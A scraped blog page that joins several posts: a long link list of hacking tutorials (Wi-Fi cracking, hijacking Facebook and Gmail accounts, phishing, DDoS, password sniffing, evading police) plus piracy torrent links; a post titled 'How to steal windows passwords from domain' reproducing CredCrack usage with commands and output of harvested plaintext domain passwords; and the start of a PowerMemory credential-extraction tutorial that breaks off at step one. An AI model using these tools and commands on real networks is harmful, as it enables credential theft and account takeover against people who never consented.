Recommended VPNs<br />
------------------------<br />
https://www.frootvpn.com/ (doesn't log SHIT, a bit sketchy for free tho)<br />
<br />
YOUTUBE TALKS <br />
----------------------------------------------------------------------------------------------------------<br />
https://www.youtube.com/watch?v=wynvicPjRDk<br />
https://www.youtube.com/watch?v=35teUHnZNGU<br />
<br />
Good reads<br />
-----------------------------------------------------------------------------------------------------------<br />
https://security.stackexchange.com/questions/32064/at-what-point-does-something-count-as-security-through-obscurity<br />
<br />
Hacktorials<br />
--------------------------------------------------------------------------------<br />
How to prepare SQL Injection attack with SQLMap on Kali Linux<br />
http://www.kalitutorials.net/2014/03/hacking-website-with-sqlmap-in-kali.html<br />
<br />
How to hack Wi-Fi using Wifite<br />
http://www.kalitutorials.net/2014/04/wifite-hacking-wifi-easy-way-kali-linux.html<br />
<br />
How to decect XSS vulnerability attack on any website using XSSER on Kali Linux<br />
https://www.youtube.com/watch?v=Kk39RACyaHc<br />
<br />
How to prepare SYN Attack using Kali Linux<br />
https://www.youtube.com/watch?v=aJ9syL4S7yE<br />
<br />
How to prepare DDOS attack on a website using Kali Linux<br />
https://www.youtube.com/watch?v=Tb8sxwQTpN8<br />
<br />
4 ways to hack Facebook account<br />
http://null-byte.wonderhowto.com/how-to/4-ways-crack-facebook-password-and-protect-yourself-from-them-0139532/<br />
<br />
4 ways hacking Gmail account<br />
http://www.wikihow.com/Hack-Gmail<br />
<br />
How to update rules in SNORT<br />
http://openmaniak.com/snort_tutorial_update.php<br />
<br />
How to hack Facebook account using SE-Toolkit on Kali Linux<br />
https://www.youtube.com/watch?v=EwhpknawB_E<br />
<br />
How to find information about some using Maltego<br />
https://www.youtube.com/watch?v=XDek66EuYJw<br />
<br />
How to gather information about someone using Backtrack<br />
https://www.youtube.com/watch?v=RiRFmlzPCIs<br />
<br />
Gathering information using NMap<br />
https://www.soldierx.com/tutorials/Pentesting-Tutorial-1-Information-Gathering-Part-1-Nmap<br />
<br />
How to install firewall on Linux machine<br />
http://pastebin.com/ZKXgf8UW<br />
<br />
How to configure firewall<br />
http://pastebin.com/mSM4beng<br />
<br />
Videotutorial pokazujacy praktyczne zastosowanie ataku Parameter Delimeter<br />
https://www.youtube.com/watch?v=i8I5jFjxKD4<br />
<br />
Step-By-Step SQL Injection<br />
https://www.youtube.com/watch?v=7H358PrFagc<br />
<br />
How to use SQLMap tool<br />
http://pastebin.com/PqXZLseE<br />
<br />
Tutorial about Search Engine Dorking<br />
http://pastebin.com/Lk67pXJf<br />
<br />
RFI Tutorial<br />
http://pastebin.com/SsTzxPUv<br />
<br />
Text tutorial about preparing Man in the Middle attack using Ettercap tool<br />
http://openmaniak.com/ettercap_filter.php<br />
<br />
How to prepare DDOS attack on a website using Kali Linux<br />
https://www.youtube.com/watch?v=Tb8sxwQTpN8<br />
<br />
How to decect XSS vulnerability attack on any website using XSSER on Kali Linux<br />
https://www.youtube.com/watch?v=Kk39RACyaHc<br />
<br />
How to prepare SQL Injection attack with SQLMap on Kali Linux<br />
http://www.kalitutorials.net/2014/03/hacking-website-with-sqlmap-in-kali.html<br />
<br />
Using HPing3 tool in Kali Linux<br />
https://www.youtube.com/watch?v=rtdrEwSBHKk<br />
<br />
How to use THC-IPv6 toolset<br />
https://www.youtube.com/watch?v=HkmlS40o-yM<br />
<br />
How to use Ping tool in Linux<br />
http://www.thegeekstuff.com/2009/11/ping-tutorial-13-effective-ping-command-examples/<br />
<br />
Tutorial about using NMap port scanner<br />
http://nmap.org/bennieston-tutorial/<br />
<br />
Usage of Brutus AET2<br />
https://dl-web.dropbox.com/get/HackTut/1brutus1.rar?_subject_uid=98829851&w=AACQZykfsnfXcFni34ssVd5KtE6BjbgIYxYTDMNt7GiLiA&dl=1<br />
<br />
How to sniff passwords using Cain<br />
https://dl-web.dropbox.com/get/HackTut/1cain1.rar?_subject_uid=98829851&w=AABoUZoTcWEypktEvKHyOWMPMyDo-EBkyyI8qwLMZi0Tfg&dl=1<br />
<br />
Sniffing logins and passwords<br />
https://dl-web.dropbox.com/get/HackTut/1dsniff.rar?_subject_uid=98829851&w=AAAhVYXG1yIxPA5KBPVAwnnv48iEHe3VzoPYebGxNXjnWw&dl=1<br />
<br />
Graphical view on the network using Etherape<br />
https://www.youtube.com/watch?v=kVyEOqXqWdw<br />
<br />
Videotutorial that shows how to use NMap on Kali Linux<br />
http://www.youtube.com/watch?v=LxScONd1HmQ<br />
<br />
How to do ARP Poisoning attack using Ettercap<br />
http://openmaniak.com/ettercap_arp.php<br />
<br />
How to prepare Man in the Middle attack using Ettercap<br />
http://www.youtube.com/watch?v=Z19p4nDfeG8<br />
<br />
How to see network usage with Ettercap<br />
http://openmaniak.com/ettercap_stat.php<br />
<br />
Description of various Network Interfaces<br />
http://openmaniak.com/networking.php<br />
<br />
Tutorial about Ping tool usage<br />
http://openmaniak.com/ping.php<br />
<br />
How to prepare SYN Attack using Kali Linux<br />
https://www.youtube.com/watch?v=aJ9syL4S7yE<br />
<br />
Videotutorial that shows how to hack WPA & WPA2 password using Aircrack-ng software<br />
https://www.youtube.com/watch?v=GLO9HGDwOY0<br />
<br />
How to crack Wi-Fi protected by WEP using Aircrack-ng<br />
http://www.aircrack-ng.org/doku.php?id=simple_wep_crack<br />
<br />
How to hack Wi-Fi protected by WPA/WPA2 using Aircrack-ng<br />
http://www.aircrack-ng.org/doku.php?id=cracking_wpa<br />
<br />
How to prepare EvilTwin attack on Kali Linux<br />
http://www.kalitutorials.net/2014/07/evil-twin-tutorial.html<br />
<br />
How to crack WEP faster in Kali Linux<br />
http://www.kalitutorials.net/2014/03/speeding-up-wep-hacking.html<br />
<br />
How to hack WEP protected Wi-Fi with Aircrack-ng<br />
http://www.kalitutorials.net/2013/08/wifi-hacking-wep.html<br />
<br />
How to hack WPA/WPA2 Wi-Fi protected network using Reaver<br />
http://www.kalitutorials.net/2014/04/hack-wpawpa2-wps-reaver-kali-linux.html<br />
<br />
How to hack Wi-Fi using Wifite<br />
http://www.kalitutorials.net/2014/04/wifite-hacking-wifi-easy-way-kali-linux.html<br />
<br />
How ATM can be hacked with just a SMS<br />
http://www.technotification.com/2014/03/windows-xp-flow-atm-being-hacked-by.html<br />
<br />
Linux Security Secrets and Solutions<br />
https://dl.dropboxusercontent.com/content_link/eClOBdAyKBl1G1eTm8HTC1jhXtikVcfGFkH1uAPS3QrMFuiOtScxTK00gbgFsa1T?dl=1<br />
<br />
Over 70 recipes to help you master Kali Linux for effective penetration testing<br />
https://dl.dropboxusercontent.com/content_link/IOvaJ93lhCZc82awc3uLrKyFmDVmmurRjDgjm81efBGcxGwvj1uwy2T1eWtrbABC?dl=1<br />
<br />
Kilka ataków na starsza wersje systemu operacyjnego Windows<br />
http://archsterowniki.ucoz.com/publ/starsze_wersje_windows/ataki_na_windows_95_98/5-1-0-234<br />
<br />
Czyli jak otworzyc plik .exe myslac ze to .jpg<br />
http://archsterowniki.ucoz.com/publ/hacking/jak_zamienic_exe_na_jpg_binder_exe_to_jpg_ukrywanie_rozszerania_plikow_jak_ukryc_rozszerzenie_pliku_jak_ukryc_rozszerzenia_plikow/11-1-0-118<br />
<br />
How to reset Windows admin password using Linux :)<br />
http://www.junauza.com/2009/01/hacking-windows-administrator-password.html<br />
<br />
How to hack Win7 using backdoor on Kali Linux<br />
https://www.youtube.com/watch?v=nBXFqHa8lWA<br />
<br />
Poradnik pokazuje jak wlamac sie do komputera z systemem windows.<br />
http://www.pcworld.pl/news/356745_2/Jak.wlamac.sie.do.komputera.html<br />
<br />
How to exploit Windows7 machine using Metasploit<br />
https://www.youtube.com/watch?v=qXLyFGyhElw<br />
<br />
Some ways to exploit Windows7 & 8 using Backtrack<br />
https://www.youtube.com/watch?v=Kbka0dW5YGI<br />
<br />
Videotutorial pokazujacy uzycie programu dnsdict6 w celu przeprowadzenia enumeracji DNS<br />
https://www.youtube.com/watch?v=gkrCc-LYEfo<br />
<br />
How to enumerate DNS using DNSMap on Kali Linux<br />
https://www.youtube.com/watch?v=ieSrHQJ61b8<br />
<br />
How to crack MD5 hash using Perl script on Kali Linux<br />
https://www.youtube.com/watch?v=zTiwlUP8VjM<br />
<br />
How to hack remote computer if you know an IP address ;)<br />
https://www.youtube.com/watch?v=XLaEqwFUFLU<br />
<br />
How to secure hard drive with TrueCrypt<br />
http://pastebin.com/UeWx06wy<br />
<br />
How to create encrypted hidden volumes in TrueCrypt<br />
http://pastebin.com/DBfSyaun<br />
<br />
Introduction to Public Key Cryptography<br />
https://developer.mozilla.org/en-US/docs/Introduction_to_Public-Key_Cryptography<br />
<br />
Film pokazuje jak odkryc numery GG, które maja ustawione dane haslo<br />
https://www.youtube.com/watch?v=01VwgaZbxLI<br />
<br />
How to admin an IRC channel :)<br />
http://pastebin.com/arksUsJM<br />
<br />
How to IRC anonymously with XChat+Tor<br />
http://pastebin.com/fxRWS6Cr<br />
<br />
https://www.youtube.com/watch?v=KLSoyp1-q80<br />
<br />
Jak zrobic wlasny jezyk programowania bazujac na Rubym. Czesc II - tworzenie jezyka kompilowanego do pseudokodu<br />
https://www.youtube.com/watch?v=_Q3e3eSJom4<br />
<br />
Jak uzywac wzorca Registry w jezyku PHP<br />
http://pastebin.com/h3VTFQwp<br />
<br />
How to install VirtualBox on Windows<br />
http://pastebin.com/YpBVDzqn<br />
<br />
How to install Guest Additions in Virtualbox<br />
http://pastebin.com/Exqh0sFb<br />
<br />
Tutorial porusza kwestie Bluetooth w androidzie :)<br />
http://andrzejklusiewicz-android.blogspot.com/2014/02/bluetooth-czyli-niebieskie-pogaduszki.html<br />
<br />
Tutorial porusza podstawy grafiki 2D w androidzie.<br />
http://andrzejklusiewicz-android.blogspot.com/2014/02/podstawowa-grafika-2d.html<br />
<br />
Kilkanascie hakerskich pojec, które powinien znac kazdy zaczynajacy przygode z hackingiem<br />
http://archsterowniki.ucoz.com/publ/hacking/hacking_podstawy/11-1-0-348<br />
<br />
How to install Ubuntu<br />
http://pastebin.com/f7Yu542i<br />
<br />
How to configure Ubuntu<br />
http://pastebin.com/ULbWWLJt<br />
<br />
Installing Tor for Windows<br />
http://pastebin.com/nqZ93QPG<br />
<br />
How to clean up traces in Windows<br />
http://pastebin.com/5fA7BvZ1<br />
<br />
How to shred free space<br />
http://pastebin.com/RfNLq3hf<br />
<br />
How to secure your computer and surf completely anonymous<br />
http://pastebin.com/PdJH535C<br />
<br />
How to configure Tor Only Environment<br />
http://pastebin.com/RLiDSaTJ<br />
<br />
How to protect yourself from police<br />
http://pastebin.com/LQ3PbBLq<br />
<br />
How to install IRC client on Linux machine<br />
http://pastebin.com/e5hhPF3u<br />
<br />
How to install Torchat<br />
http://pastebin.com/57T1sZU9<br />
<br />
How to configure SNORT<br />
http://openmaniak.com/snort_tutorial_snort.php<br />
<br />
Daily usage of Tor<br />
http://pastebin.com/fJjgaPvz<br />
<br />
Basic usage of Wireshark<br />
http://openmaniak.com/wireshark_use.php<br />
<br />
Usage of Wireshark's filters<br />
http://openmaniak.com/wireshark_filters.php<br />
<br />
How to configure BASE to work with SNORT<br />
http://openmaniak.com/snort_tutorial_base.php<br />
<br />
Using BleedingSNORT rules in SNORT<br />
http://openmaniak.com/snort_bleeding.php<br />
<br />
Some things about Port Mirroring in SNORT<br />
http://openmaniak.com/snort_other.php<br />
<br />
How to use TCPDump tool<br />
http://openmaniak.com/tcpdump.php<br />
<br />
How to use HarVester tool in Kali Linux<br />
https://www.youtube.com/watch?v=lohGefBjOI8<br />
<br />
Wyjasnienie znaczenia komunikatów tekstowych w BIOS'ie<br />
http://archsterowniki.ucoz.com/publ/dla_mlodych_informatykow/komunikaty_tekstowe_bios/17-1-0-444<br />
<br />
How to turn your smartphone into computer webcam<br />
http://www.technotification.com/2014/11/smartphone-as-webcam-you-gotta-be-kidding-me.html<br />
<br />
Conclusion about Black Hat Style tutorials<br />
http://pastebin.com/h43WBzGy<br />
<br />
Good linux torrent clients<br />
----------------------------<br />
http://deluge-torrent.org/ <--- been told this is the best torrent client ever to come to Linux, and i have to agree<br />
<br />
http://www.qbittorrent.org/ <--- i use this, its pretty great<br />
<br />
Look into Rtorrent as well <br />
<br />
20 things to do after installing kalinux <br />
---------------------------------------------------<br />
http://www.blackmoreops.com/2014/03/03/20-things-installing-kali-linux/<br />
<br />
<br />
Coding challenges and recources that will make you a expert coder <br />
--------------------------------------------------------<br />
https://github.com/karan/Projects<br />
<br />
http://codingbat.com/<br />
<br />
http://rosettacode.org/wiki/Category:Programming_Tasks<br />
<br />
http://www.reddit.com/r/beginnerprojects<br />
<br />
https://github.com/karan/Projects-Solutions/blob/master/README.md<br />
<br />
https://www.daniweb.com/software-development/python/threads/131973/5-crucial-projects-for-beginners<br />
<br />
http://inventwithpython.com/blog/2012/02/20/i-need-practice-programming-49-ideas-for-game-clones-to-code/<br />
<br />
http://theinternetwishlist.com/<br />
<br />
http://www.ideamachine.io/<br />
<br />
http://blog.programmersmotivation.com/2014/07/09/list-projects/<br />
<br />
How to compile a linux program from source <br />
-------------------------------------------<br />
https://www.youtube.com/watch?v=C7_5zsaQlFE<br />
<br />
torrent websites <br />
------------------------------------<br />
https://kickass.so/<br />
<br />
https://oldpiratebay.org/<br />
<br />
Magnet links to VERRYYY big files with libraries of information<br />
-------------------------------------------------------------------<br />
magnet:?xt=urn:btih:0bbfaaf5f469a2bd3d762f6942a302f7014a35e9&dn=Gentoomen%20Library&tr=udp%3A%2F%2Ftracker.openbittorrent.com%3A80&tr=udp%3A%2F%2Ftracker.publicbt.com%3A80&tr=udp%3A%2F%20%2Ftracker.ccc.de%3A80 (/G/entooman's library, 32 GB of computer information from A-Z, a bit outdated)<br />
<br />
(75 gig file full of every instruction and guide posted on halfchan /k/, a /k/omando's dream)<br />
magnet:?xt=urn:btih:J3ZVT72VI4MJB5QGET2IKTU6XNRPSJZD&dn=Mega%20Folder&tr=udp%3a%2f%2ftracker.openbittorrent.com%3a80&tr=udp%3a%2f%2ftracker.openbittorrent.com%3a80%2fannounce&tr=udp%3a%2f%2ftracker.publicbt.com%3a80&tr=udp%3a%2f%2ftracker.publicbt.com%3a80%2fannounce&tr=http%3a%2f%2ftracker.best-torrents.net%3a6969%2fannounce&tr=http%3a%2f%2fwww.eddie4.nl%3a6969%2fannounce&tr=udp%3a%2f%2fopen.demonii.com%3a1337&tr=udp%3a%2f%2ftracker.ccc.de%3a80&tr=udp%3a%2f%2ftracker-ccc.de%3a6969&tr=udp%3a%2f%2ffr33domtracker.h33t.com%3a3310%2fannounce&tr=udp%3a%2f%2ftracker.istole.it%3a6969&tr=udp%3a%2f%2ftracker.istole.it%3a80%2fannounce<br />
<br />
magnet:?xt=urn:btih:c09013f19e37e8aae5465565fd1b266931179c44&dn=The%20Ultimate%20IT%20Ebooks%20Collection%20-%201800%2b%20IT%20and%20Computer%20Science%20Ebooks%20from%20http_%e2%81%84%e2%81%84it-ebooks.info <--- 1800 IT related<br />
books, some seed it for fucks sake<br />
<br />
Linux eBooks Collection [PDF]<br />
<br />
magnet:?xt=urn:btih:807b42a48a011e68e23a8ba4ccdc699057944c16&dn=Linux%20eBooks%20Collection%20%5bPDF%5d<br />
<br />
Narzew tutorials <br />
--------------------------------------------------------------------------------------------------------------------------------------------<br />
Kali Linux Cookbook<br />
Over 70 recipes to help you master Kali Linux for effective penetration testing<br />
http://hacktut.ugu.pl/?id=17<br />
http://sh.st/udWE4<br />
<br />
Black Hat Style - Tor Only Environment<br />
How to configure Tor Only Environment<br />
http://hacktut.ugu.pl/?id=41<br />
http://sh.st/ulCL3<br />
<br />
Hacking Facebook with SET Phishing<br />
How to hack Facebook account using SE-Toolkit on Kali Linux<br />
http://hacktut.ugu.pl/?id=18<br />
http://sh.st/udEmQ<br />
<br />
Search Engine Dorking<br />
Tutorial about Search Engine Dorking<br />
http://hacktut.ugu.pl/?id=22<br />
http://sh.st/uhRq7<br />
<br />
Using XChat with Tor<br />
How to IRC anonymously with XChat+Tor<br />
http://hacktut.ugu.pl/?id=44<br />
http://sh.st/ulM5K<br />
<br />
Ataki na Windows 95/98<br />
Kilka ataków na starszą wersję systemu operacyjnego Windows<br />
http://hacktut.ugu.pl/?id=12<br />
http://sh.st/uaCps<br />
<br />
Black Hat Style - Tor Daily Usage<br />
Daily usage of Tor<br />
http://hacktut.ugu.pl/?id=40<br />
http://sh.st/ulCKu<br />
<br />
Black Hat Style - Installing Firewall<br />
How to install firewall on Linux machine<br />
http://hacktut.ugu.pl/?id=32<br />
http://sh.st/ulAsf<br />
<br />
Hacking Facebook account<br />
4 ways to hack Facebook account<br />
http://hacktut.ugu.pl/?id=6<br />
http://sh.st/uuVvJ<br />
<br />
Black Hat Style - Installing IRC client on Linux machine<br />
How to install IRC client on Linux machine<br />
http://hacktut.ugu.pl/?id=37<br />
http://sh.st/ulHCG<br />
<br />
Komunikaty tekstowe BIOS<br />
Wyjaśnienie znaczenia komunikatów tekstowych w BIOS'ie<br />
http://hacktut.ugu.pl/?id=39<br />
http://sh.st/ulKx2<br />
<br />
SQLMap For Dummies<br />
How to use SQLMap tool<br />
http://hacktut.ugu.pl/?id=21<br />
http://sh.st/uhELL<br />
<br />
Hacking Linux Exposed - 3rd Edition<br />
Linux Security Secrets and Solutions<br />
http://hacktut.ugu.pl/?id=16<br />
http://sh.st/udWWZ<br />
<br />
Podstawy hackingu<br />
Kilkanaście hakerskich pojęć, które powinien znać każdy zaczynający przygodę z hackingiem<br />
http://hacktut.ugu.pl/?id=14<br />
http://sh.st/uaCpf<br />
<br />
Black Hat Style - Firewall Configuration<br />
How to configure firewall<br />
http://hacktut.ugu.pl/?id=33<br />
http://sh.st/ulAgn<br />
<br />
Hacking remote computer with IP address<br />
How to hack remote computer if you know an IP address ;)<br />
http://hacktut.ugu.pl/?id=19<br />
http://sh.st/udEBi<br />
<br />
Black Hat Style - Securing Hard Drive<br />
How to secure hard drive with TrueCrypt<br />
http://hacktut.ugu.pl/?id=25<br />
http://sh.st/ukMqL<br />
<br />
Ping Tutorial<br />
How to use Ping tool in Linux<br />
http://hacktut.ugu.pl/?id=9<br />
http://sh.st/uaov1<br />
<br />
Własny język programowania cz. 2<br />
Jak zrobić własny język programowania bazując na Rubym. Część II - tworzenie języka kompilowanego do pseudokodu<br />
http://hacktut.ugu.pl/?id=47<br />
http://sh.st/uzqSi<br />
<br />
Black Hat Style - Shredding Free Space<br />
How to shred free space<br />
http://hacktut.ugu.pl/?id=28<br />
http://sh.st/ukMoF<br />
<br />
NMap - A Stealth Port Scanner<br />
Tutorial about using NMap port scanner<br />
http://hacktut.ugu.pl/?id=10<br />
http://sh.st/uaov2<br />
<br />
Black Hat Style - Tor for Windows<br />
Installing Tor for Windows<br />
http://hacktut.ugu.pl/?id=24<br />
http://sh.st/ukXtT<br />
<br />
Black Hat Style - Installing Torchat<br />
How to install Torchat<br />
http://hacktut.ugu.pl/?id=38<br />
http://sh.st/ulKlf<br />
<br />
Black Hat Style - How to secure your computer and surf anonymously<br />
How to secure your computer and surf completely anonymous<br />
http://hacktut.ugu.pl/?id=29<br />
http://sh.st/ukMAs<br />
<br />
Sniffing logins and passwords<br />
Sniffing logins and passwords<br />
http://hacktut.ugu.pl/?id=20<br />
http://sh.st/udRFG<br />
<br />
Hacking Gmail<br />
4 ways hacking Gmail account<br />
http://hacktut.ugu.pl/?id=8<br />
http://sh.st/uaovM<br />
<br />
Black Hat Style - Conclusion<br />
Conclusion about Black Hat Style tutorials<br />
http://hacktut.ugu.pl/?id=42<br />
http://sh.st/ulCXW<br />
<br />
IRC Channel Operator Tutorial<br />
How to admin an IRC channel :)<br />
http://hacktut.ugu.pl/?id=43<br />
http://sh.st/ulM2O<br />
<br />
Remote File Inclusion<br />
RFI Tutorial<br />
http://hacktut.ugu.pl/?id=23<br />
http://sh.st/ukKaj<br />
<br />
Black Hat Style - Ubuntu Configuration<br />
How to configure Ubuntu<br />
http://hacktut.ugu.pl/?id=35<br />
http://sh.st/ulFe9<br />
<br />
Black Hat Style - Setting up TrueCrypt, Encrypted Hidden Volumes<br />
How to create encrypted hidden volumes in TrueCrypt<br />
http://hacktut.ugu.pl/?id=26<br />
http://sh.st/ukMrt<br />
<br />
Atak Parameter Delimeter w praktyce<br />
Videotutorial pokazujący praktyczne zastosowanie ataku Parameter Delimeter<br />
http://hacktut.ugu.pl/?id=2<br />
http://sh.st/uuDOc<br />
<br />
Black Hat Style - Installing VirtualBox on Windows<br />
How to install VirtualBox on Windows<br />
http://hacktut.ugu.pl/?id=31<br />
http://sh.st/uk1KZ<br />
<br />
SQL Injection Step-By-Step<br />
Step-By-Step SQL Injection<br />
http://hacktut.ugu.pl/?id=7<br />
http://sh.st/up5dW<br />
<br />
DNS Enumeration w praktyce<br />
Videotutorial pokazujący użycie programu dnsdict6 w celu przeprowadzenia enumeracji DNS<br />
http://hacktut.ugu.pl/?id=1<br />
http://sh.st/y3PEm<br />
<br />
HPing3 Tutorial<br />
Using HPing3 tool in Kali Linux<br />
http://hacktut.ugu.pl/?id=4<br />
http://sh.st/uuLOI<br />
<br />
Black Hat Style - HD CleanUp Windows<br />
How to clean up traces in Windows<br />
http://hacktut.ugu.pl/?id=27<br />
http://sh.st/ukMtH<br />
<br />
Reseting Windows Administrator Password<br />
How to reset Windows admin password using Linux :)<br />
http://hacktut.ugu.pl/?id=45<br />
http://sh.st/ulMN4<br />
<br />
Brutus AET2<br />
Usage of Brutus AET2<br />
http://hacktut.ugu.pl/?id=11<br />
http://sh.st/uaCtE<br />
<br />
Sniffing Passwords using Cain<br />
How to sniff passwords using Cain<br />
http://hacktut.ugu.pl/?id=15<br />
http://sh.st/uaCRc<br />
<br />
THC-IPv6 Tutorial<br />
How to use THC-IPv6 toolset<br />
http://hacktut.ugu.pl/?id=5<br />
http://sh.st/uuZLy<br />
<br />
Black Hat Style - Installing Ubuntu<br />
How to install Ubuntu<br />
http://hacktut.ugu.pl/?id=34<br />
http://sh.st/ulF02<br />
<br />
DNS Enumeration using DNSMap<br />
How to enumerate DNS using DNSMap on Kali Linux<br />
http://hacktut.ugu.pl/?id=3<br />
http://sh.st/uuKcI<br />
<br />
Ukrywanie rozszerzeń plików<br />
Czyli jak otworzyć plik .exe myśląć że to .jpg<br />
http://hacktut.ugu.pl/?id=13<br />
http://sh.st/uaCpd<br />
<br />
Własny język programowania cz. 1<br />
Jak zrobić własny język programowania bazując na Rubym. Część I - tworzenie języka interpretowanego<br />
http://hacktut.ugu.pl/?id=46<br />
http://sh.st/ul9rT<br />
<br />
Black Hat Style - Installing VirtualBox Guest Additions<br />
How to install Guest Additions in Virtualbox<br />
http://hacktut.ugu.pl/?id=36<br />
http://sh.st/ulFBU<br />
<br />
Anti-Police Tutorial<br />
How to protect yourself from police<br />
http://hacktut.ugu.pl/?id=30<br />
<br />
<br />
<br />
ONLINE COMPILERS <br />
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br />
http://ideone.com/<br />
<br />
http://codepad.org/<br />
<br />
<br />
<br />
FREE ONLINE EBOOKS<br />
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br />
<br />
it-ebooks.info <---Dedicated to only IT books; very fast; unlimited downloads.<br />
<br />
bookzz.org<br />
booksc.org<br />
bookos-z1.org<br />
^All of them are sisters; huge and rapidly increasing resources of everything (at the present nearly 2.5 million books are available); free users are limited to 10 (actually 9 !!) books per day.<br />
<br />
freescienceengineering.library.elibgen.org <------Another great resource; however most of the books are outdated,be warned!</div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com161tag:blogger.com,1999:blog-4509349481580895365.post-91627120267134864322015-08-31T17:40:00.002+05:302015-08-31T17:40:31.918+05:30How to steal windows passwords from domain<div dir="ltr" style="text-align: left;" trbidi="on">
<h1>
CredCrack</h1>
<h2>
Introduction</h2>
<hr />
CredCrack is a fast and stealthy credential harvester. It exfiltrates
credentials recusively in memory and in the clear. Upon completion,
CredCrack will parse and output the credentials while identifying any
domain administrators obtained. CredCrack also comes with the ability to
list and enumerate share access and yes, it is threaded!<br />
CredCrack has been tested and runs with the tools found natively in
Kali Linux. CredCrack solely relies on having PowerSploit's
"Invoke-Mimikatz.ps1" under the /var/www directory. <a href="https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1">Download Invoke-Mimikatz Here</a><br />
<h2>
Help</h2>
<hr />
<pre><code>usage: credcrack.py [-h] -d DOMAIN -u USER [-f FILE] [-r RHOST] [-es]
[-l LHOST] [-t THREADS]
CredCrack - A stealthy credential harvester by Jonathan Broche (@g0jhonny)
optional arguments:
-h, --help show this help message and exit
-f FILE, --file FILE File containing IPs to harvest creds from. One IP per
line.
-r RHOST, --rhost RHOST
Remote host IP to harvest creds from.
-es, --enumshares Examine share access on the remote IP(s)
-l LHOST, --lhost LHOST
Local host IP to launch scans from.
-t THREADS, --threads THREADS
Number of threads (default: 10)
Required:
-d DOMAIN, --domain DOMAIN
Domain or Workstation
-u USER, --user USER Domain username
Examples:
./credcrack.py -d acme -u bob -f hosts -es
./credcrack.py -d acme -u bob -f hosts -l 192.168.1.102 -t 20
</code></pre>
<h2>
Examples</h2>
<hr />
<h3>
Enumerating Share Access</h3>
<pre><code>./credcrack.py -r 192.168.1.100 -d acme -u bob --es
Password:
---------------------------------------------------------------------
CredCrack v1.1 by Jonathan Broche (@g0jhonny)
---------------------------------------------------------------------
[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Validating 192.168.1.100
-----------------------------------------------------------------
192.168.1.102 - Windows 7 Professional 7601 Service Pack 1
-----------------------------------------------------------------
OPEN \\192.168.1.102\ADMIN$
OPEN \\192.168.1.102\C$
-----------------------------------------------------------------
192.168.1.103 - Windows Vista (TM) Ultimate 6002 Service Pack 2
-----------------------------------------------------------------
OPEN \\192.168.1.103\ADMIN$
OPEN \\192.168.1.103\C$
CLOSED \\192.168.1.103\F$
-----------------------------------------------------------------
192.168.1.100 - Windows Server 2008 R2 Enterprise 7601 Service Pack 1
-----------------------------------------------------------------
CLOSED \\192.168.1.100\ADMIN$
CLOSED \\192.168.1.100\C$
OPEN \\192.168.1.100\NETLOGON
OPEN \\192.168.1.100\SYSVOL
[*] Done! Completed in 0.8s
</code></pre>
<h3>
Harvesting credentials</h3>
<hr />
<pre><code>./credcrack.py -f hosts -d acme -u bob -l 192.168.1.100
Password:
---------------------------------------------------------------------
CredCrack v1.1 by Jonathan Broche (@g0jhonny)
---------------------------------------------------------------------
[*] Setting up the stage
[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Querying domain admin group from 192.168.1.102
[*] Harvesting credentials from 192.168.1.102
[*] Harvesting credentials from 192.168.1.103
The loot has arrived...
__________
/\____;;___\
| / /
`. ())oo() .
|\(%()*^^()^\
%| |-%-------|
% \ | % )) |
% \|%________|
[*] Host: 192.168.1.102 Domain: ACME User: jsmith Password: Good0ljm1th
[*] Host: 192.168.1.103 Domain: ACME User: daguy Password: P@ssw0rd1!
1 domain administrators found and highlighted in yellow above!
[*] Cleaning up
[*] Done! Loot may be found under /root/CCloot folder
[*] Completed in 11.3s
</code></pre>
<h4>
<br /></h4>
<h4>
<br /></h4>
<h4>
Download credcrack from <a href="https://github.com/gojhonny/CredCrack" target="_blank">here</a></h4>
</div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com15tag:blogger.com,1999:blog-4509349481580895365.post-56605142191851010212015-08-31T15:47:00.001+05:302015-08-31T15:47:31.329+05:30Power Memory : Tutorial <div dir="ltr" style="text-align: left;" trbidi="on">
<h2>
This post explains how to use the PowerMemory script to reveal the
passwords used by users of the computers running under Windows systems.</h2>
<u><i>Disclaimer</i></u><br />
<i>Any actions and or activities related to the material contained
within this blog is solely your responsibility.The misuse of the
information in this website can result in criminal charges brought
against the persons in question. The authors will not be held
responsible in the event any criminal charges be brought against any
individuals misusing the information in this website to break the law.</i><i><br />
</i><i>This script is published for educational use only. I am no way responsible for any misuse of the information.</i><i><br />
</i><i>This article is related to Computer Security and I am not promote hacking / cracking / software piracy.</i><i><br />
</i><i>This article is not a GUIDE of Hacking. It is only provide
information about the legal ways of retrieving the passwords. You shall
not misuse the information to gain unauthorised access. However you may
try out these hacks on your own computer at your own risk. Performing
hack attempts (without permission) on computers that you do not own is
illegal.</i><br />
Today I want to present a powerful script dubbed PoweMemory that
allows pen testers to extract user credentials present in memory and
files. PoweMemory is a script <a href="http://sysadminconcombre.blogspot.ca/2015/07/how-to-hack-windows-password.html" target="_blank">developed</a> by
Pierre-Alexandre Braeken to make a proof of concept of how retrieve
Windows credentials with Powershell and CDB Command-Line Options
(Windows Debuggers). It works on Windows OS from Windows 2003 to 2012
and according to the author it is able to retrieve credentials also from
Windows 10.<br />
PoweMemory was tested on 2003, 2008r2, 2012, 2012r2 and Windows 7 – 32 and 64 bits, Windows 8 and Windows 10 Home edition.<br />
<em><strong>Features</strong>:</em><br />
<em>+ it’s fully PowerShell</em><br />
<em>+ it can work locally, remotely or from a dump file collected on a machine</em><br />
<em>+ it does not use the operating system .dll to locate credentials address in memory but a simple Microsoft debugger</em><br />
<em>+ it does not use the operating system .dll to </em>decypher<em> passwords collected –> it is does in the PowerShell (AES, TripleDES, DES-X)</em><br />
<em>+ it breaks undocumented Microsoft DES-X</em><br />
<em>+ it works even if you are on a different architecture than the target</em><br />
<em>+ it leaves no trace in memoryless</em><br />
<a href="http://securityaffairs.co/wordpress/wp-content/uploads/2015/08/PowerMemory.jpg"><img alt="PowerMemory" class="aligncenter wp-image-39725" height="269" src="http://securityaffairs.co/wordpress/wp-content/uploads/2015/08/PowerMemory.jpg" width="500" /></a><br />
<br />
The steps necessary to use PoweMemory and retrieve user credentials are:<br />
1) Download the tool<br />
